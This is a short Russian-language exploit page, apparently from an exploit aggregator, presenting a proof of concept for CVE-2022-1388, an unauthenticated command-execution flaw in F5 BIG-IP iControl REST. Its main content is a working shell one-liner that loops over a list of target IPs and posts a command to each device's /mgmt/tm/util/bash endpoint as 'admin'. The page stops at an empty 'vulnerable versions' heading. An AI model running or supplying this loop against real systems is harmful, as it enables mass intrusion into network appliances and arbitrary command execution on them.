## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SHAMO0-CVE-2022-1388
# PoC для уязвимости BIG-IP iControl REST CVE-2022-1388

Эта уязвимость может позволить неаутентифицированному злоумышленнику, имеющему сетевой доступ к системе BIG-IP через порт управления и/или self IP-адреса, выполнять произвольные системные команды, создавать или удалять файлы, либо отключать сервисы.
## PoC
Вы можете использовать следующую однострочную команду curl для проверки уязвимости F5 Big-IP или воспользоваться предоставленным Python-скриптом.
root@kitploit:~
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
## Уязвимые версии (Big-IP)